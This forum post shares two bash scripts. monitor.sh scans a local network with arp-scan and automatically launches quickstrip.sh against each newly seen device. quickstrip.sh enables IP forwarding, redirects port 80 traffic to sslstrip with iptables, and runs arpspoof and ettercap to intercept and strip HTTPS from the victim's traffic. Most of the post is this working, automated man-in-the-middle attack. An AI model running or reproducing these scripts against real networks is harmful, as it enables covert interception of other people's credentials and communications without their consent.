Edited to fix my long-winded post and fix a few errors.
monitor.sh v1.0.1
Code:
#!/bin/bash
# monitor.sh v1.0.1
# creator: phillips321
# This tool requires arp-scan to be installed and to be run as root
#
# ChangeLog....
# Version 1.0.1 - Minor fixes
# Version 1.0 - First Release
#################################################################
# CHECKING FOR ROOT
#################################################################
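# Abort unless the effective UID is 0.
# The UID is taken from `id -u` rather than from $USER: $USER is an ordinary
# environment variable, so it can be unset (cron, stripped environments) or
# set to any value by the caller. With the old unquoted test an empty $USER
# produced a malformed `[` expression and the script carried on regardless.
if [ "$(id -u)" -ne 0 ]
then
  echo "MESSAGE:"
  echo "MESSAGE: ERROR: Please run as root!"
  echo "MESSAGE:"
  exit 1
fi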
#################################################################
# CHECKING TO SEE IF INTERFACE PROVIDED
#################################################################
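# Require the interface name as the first argument and validate it before it
# is handed to ifconfig, route and arp-scan further down.
# Sets: INTERFACE
if [ -z "${1:-}" ]
then
  echo "MESSAGE: Usage: $(basename -- "${0}") [interface] [time between scans (secs)]"
  echo "MESSAGE: $(basename -- "${0}") eth0 60"
  echo "ERROR: Please provide an interface to scan on"
  exit 1
fi
# The previous `cut -c 1-6` silently truncated the argument, so a longer name
# (for example enp0s31f6) was turned into a different string and could select
# the wrong interface. Validate instead of truncating: reject a leading '-'
# (it would be read as an option by the tools below) and any character that
# does not occur in ordinary interface names.
case "${1}" in
  -* | *[!A-Za-z0-9_.:-]*)
    echo "ERROR: '${1}' is not a valid interface name"
    exit 1
    ;;
esac
# Linux limits interface names to 15 characters.
if [ "${#1}" -gt 15 ]
then
  echo "ERROR: '${1}' is not a valid interface name"
  exit 1
fi
INTERFACE="${1}"
echo "MESSAGE: Monitoring ${INTERFACE} for new devices"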
#################################################################
# CHECKING TO SEE IF PROBE INTERVAL GIVEN
#################################################################
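# Require the scan interval (seconds) as the second argument.
# Sets: INTERVAL - digits only, at most four of them.
if [ -z "${2:-}" ]
then
  echo "MESSAGE: Usage: $(basename -- "${0}") [interface] [time between scans (secs)]"
  echo "MESSAGE: $(basename -- "${0}") eth0 60"
  echo "ERROR: Please provide a scan interval in seconds"
  exit 1
fi
# Same filtering as before: drop everything that is not a digit, keep at most
# four characters.
INTERVAL="$(printf '%s' "${2}" | tr -cd '[:digit:]' | cut -c 1-4)"
# An argument without digits used to leave INTERVAL empty, and an empty or
# all-zero interval gives `read -t` nothing to wait for, so the monitoring
# loop would rescan back to back. Refuse both.
case "${INTERVAL}" in
  *[!0]*)
    : # at least one non-zero digit: usable
    ;;
  *)
    echo "ERROR: Please provide a scan interval in seconds (a positive whole number)"
    exit 1
    ;;
esac
echo "MESSAGE: Scanning once every ${INTERVAL} seconds"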
#################################################################
# IDENTIFY IP, GATEWAY and SUBNET
#################################################################
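# Look up this host's address, netmask and default gateway on the chosen
# interface. In the visible script these values are only printed.
# NOTE(review): the ifconfig parsing expects the older net-tools layout
# ("inet addr:" / "Mask:"); newer ifconfig builds print "inet" / "netmask"
# instead, which would leave IPADDR and SUBNET empty - confirm on the target
# system.
IPADDR=$(ifconfig "${INTERFACE}" | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}')
SUBNET=$(ifconfig "${INTERFACE}" | grep 'Mask:' | grep -v '127.0.0.1' | cut -d: -f4)
# Match the interface against the Iface column exactly (last field of
# `route -n`) instead of grepping the whole line for an unquoted pattern,
# which also matched longer names containing it and treated '.' as a
# wildcard. The gateway is the second column of routes flagged UG.
GATEWAY=$(route -n | awk -v ifc="${INTERFACE}" '$NF == ifc && $4 ~ /UG/ { print $2 }')
echo "MESSAGE: interface=${INTERFACE} gateway=${GATEWAY} ip.addr=${IPADDR} subnet=${SUBNET}"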
#################################################################
# DELETE FILES FROM PREVIOUS SCANS
#################################################################
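# Remove result files left behind by an earlier run.
# NOTE(review): SCAN.txt and WHITELIST.txt are fixed names in the current
# directory and are written as root. Run the script from a directory that
# only root can write to, so that nothing else can pre-create those names.
rm -rf -- SCAN.txt WHITELIST.txt
#################################################################
# PERFORMING FIRST SCAN TO CREATE WHITELIST
#################################################################
# The sed stage drops the first two lines of arp-scan's output, deletes from
# the first blank line through the two lines after it, and collapses runs of
# whitespace into '#'. cut then keeps only the first column, so the baseline
# (and every later comparison against it) is by address alone; the remaining
# columns of each result line are discarded.
# ${INTERFACE} is quoted so that it always reaches arp-scan as a single word.
arp-scan -l -I "${INTERFACE}" \
  | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' \
  | cut -d '#' -f 1 > WHITELIST.txt
if [ -s WHITELIST.txt ]; then
  echo "MESSAGE: The following devices were found and will be excluded from this monitor."
  cat WHITELIST.txt
else
  # An empty baseline would make every host look new, so stop here.
  echo "MESSAGE: No IPs found during arp-scan, are you sure your interface is up?."
  exit 1
fi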
#################################################################
# THIS IS THE MONITORING BIT
#################################################################
# Main loop: rescan, compare against the whitelist, react to anything new,
# then wait. The loop ends when a line is read on stdin (see `read` below).
while true; do
# Same arp-scan/sed/cut pipeline as the initial scan; only the first
# '#'-separated field of each result line is written to SCAN.txt.
arp-scan -l -I ${INTERFACE} | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 > SCAN.txt
# NOTE(review): `+3 -0` is the obsolete "+POS -POS" sort-key syntax,
# presumably meant to order the addresses by their last octet - confirm the
# installed sort still accepts it.
sort -n -t '.' +3 -0 -o SCAN.txt SCAN.txt
# Lines that diff marks with '<' exist in SCAN.txt but not in WHITELIST.txt;
# the sed strips the marker and keeps the rest of the line.
NEWIP=`diff -a SCAN.txt WHITELIST.txt | grep \< | sed -e 's/< //'`
# NOTE(review): ${NEWIP} is unquoted. If more than one address shows up in a
# single pass it expands to several words inside `[ ... ]` - confirm the test
# still behaves as intended in that case.
if [ ! -z ${NEWIP} ]; then
echo "MESSAGE: New IP detected!!! ${NEWIP}"
# Append to the whitelist so the same address is not reported on later passes.
echo ${NEWIP} >> WHITELIST.txt
#################################################################
# To run a command when new device found please enter it here
# The active hook starts ./quickstrip.sh in a konsole window, in the
# background, passing it the interface and the new address.
# NOTE(review): the path is relative to the current directory and this script
# runs as root, so whatever file sits at ./quickstrip.sh is executed as root.
# The commented-out line below it is an alternative hook.
konsole -e ./quickstrip.sh ${INTERFACE} ${NEWIP} &
# xterm -e "nmap ${NEWIP}"
#################################################################
fi
# Re-sort the whitelist after a possible append (same obsolete key syntax as
# the sort above).
sort -n -t '.' +3 -0 -o WHITELIST.txt WHITELIST.txt
# Wait up to INTERVAL seconds for a line on stdin; if one arrives, leave the
# loop, otherwise start the next scan.
read -t ${INTERVAL} && break
done
# Remove the working files from the current directory before exiting.
rm -rf WHITELIST.txt SCAN.txt
exit 0
quickstrip v1.0.1
Code:
#!/bin/bash
# quickstrip.sh v1.0.1
# creator: mrshrek
# This tool requires arpspoof ettercap and sslstrip to be installed
# It also must be run as root.
#
# Designed to be used with Phillips321's monitor.sh or on its own
#
# ChangeLog...
# Version 1.0.1 - Minor fixes, checked for instances of sslstrip
# - and ettercap so it wouldnt fail when called
# - multiple times by monitor.sh
# - also added cleanup script for multiple instances.
#
# Version 1.0 - First Release
#################################################################
# CHECKING FOR ROOT
#################################################################
# Stop unless $USER expands to "root".
# NOTE(review): $USER is an environment variable rather than the effective
# UID, and the expansion is unquoted, so an empty or unset $USER leaves `[`
# with a malformed expression - confirm how this behaves under sudo or cron.
if [ `echo -n $USER` != "root" ]
then
echo "ERROR: Please run as root!"
exit 1
fi
#################################################################
# CHECK TO SEE IF THERE IS AN OLD CLEANUP SCRIPT
#################################################################
# Delete any sslcleanup.sh already present in the current directory
# (`-a` used as a unary test: the file exists).
if [ -a sslcleanup.sh ]
then
rm -rf sslcleanup.sh
fi
#################################################################
# CHECK FOR ARGS
#################################################################
# Needs two arguments: $1 = interface, $2 = IP address (per the usage text).
# Host-side state changed by the else branch below, which is what a later
# review of the machine would find: net.ipv4.ip_forward set to 1 and one
# REDIRECT rule appended to the nat PREROUTING chain.
if [ -z $1 ] || [ -z $2 ]
then
echo "Usage: ./quickstrip.sh INTERFACE IPADDRESS"
exit 1
else
#################################################################
# SETUP IP FORWARDING AND IPTABLES
#################################################################
# Read the current forwarding flag and switch it on only if it is not
# already 1. IP_FORWARD is not referenced again in this script.
IP_FORWARD=`cat /proc/sys/net/ipv4/ip_forward`
if [ $IP_FORWARD != 1 ]
then
echo 1 > /proc/sys/net/ipv4/ip_forward
fi
# Append (-A) a nat PREROUTING rule: TCP traffic to port 80 arriving on
# interface $1 is redirected to local port 10000. Because the rule is
# appended on every run, repeated invocations add repeated copies.
iptables -t nat -A PREROUTING -i $1 -p tcp --dport 80 -j REDIRECT --to-port 10000
#################################################################
# SETUP ARPSPOOF, ETTERCAP AND SSLSTRIP. CHECK OTHER INSTANCES
#################################################################
# GATEWAY: second whitespace-separated field of the `route -n` lines that
# contain both $1 and "UG".
GATEWAY=`route -n | grep $1 | grep UG | sed -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 2`
# ETTERPID / SSLPID: second '#'-separated field of matching `ps aux` lines,
# presumably the PID column. The bracket set here is written "[ /t]", so the
# sed collapses runs of space, '/' and the letter 't' - not tab as in the
# GATEWAY line above.
ETTERPID=`ps aux | grep "ettercap -T -q -i" | grep -v grep | sed -e "s/[ /t][ /t]*/#/g" | cut -d '#' -f 2`
SSLPID=`ps aux | grep "sslstrip" | grep "python" | sed -e "s/[ /t][ /t]*/#/g" | cut -d '#' -f 2`
# Each run opens a new konsole window running arpspoof with the interface,
# the target address and the gateway found above; it is backgrounded and its
# PID is not kept.
konsole -e arpspoof -i $1 -t $2 $GATEWAY &
# sslstrip is started only when no existing instance was found above.
# NOTE(review): the PID variables are unquoted; several matches expand to
# several words inside `[ ... ]` - confirm the tests behave as intended.
if [ -z $SSLPID ]
then
konsole -e sslstrip -a -k -f &
fi
# ettercap runs in the foreground of this script when no instance was found,
# so the script continues past this point only after ettercap exits.
if [ -z $ETTERPID ]
then
ettercap -T -q -i $1
fi
fi
##################################################################
# CLEAN UP THE MESS IF WE ARE ALL DONE.
##################################################################
# ETTERPID and SSLPID still hold the values captured before anything was
# launched. If either is empty, undo the setup here; otherwise leave the
# state in place and write a helper script for later cleanup.
if [ -z $ETTERPID ] || [ -z $SSLPID ]
then
# Delete one copy of the REDIRECT rule, write 0 to ip_forward
# unconditionally (not the value it had before the run), and remove
# sslstrip.log from the current directory.
iptables -t nat -D PREROUTING -i $1 -p tcp --dport 80 -j REDIRECT --to-port 10000
echo 0 > /proc/sys/net/ipv4/ip_forward
rm sslstrip.log
else
echo "SSLSTRIP or ETTERCAP still running."
echo "To clean up please run: sslcleanup.sh"
# NOTE(review): an existing sslcleanup.sh is deleted near the top of the
# script, so this check presumably only succeeds if another instance created
# the file in the meantime - confirm.
if [ -a sslcleanup.sh ]
then
exit 0
else
# Write the same three cleanup commands to ./sslcleanup.sh and mark it
# executable. $1 is expanded now, so the interface name is baked into the
# file. The generated file has no shebang line.
echo "iptables -t nat -D PREROUTING -i $1 -p tcp --dport 80 -j REDIRECT --to-port 10000" > sslcleanup.sh
echo "echo 0 > /proc/sys/net/ipv4/ip_forward" >> sslcleanup.sh
echo "rm sslstrip.log" >> sslcleanup.sh
chmod +x sslcleanup.sh
fi
fi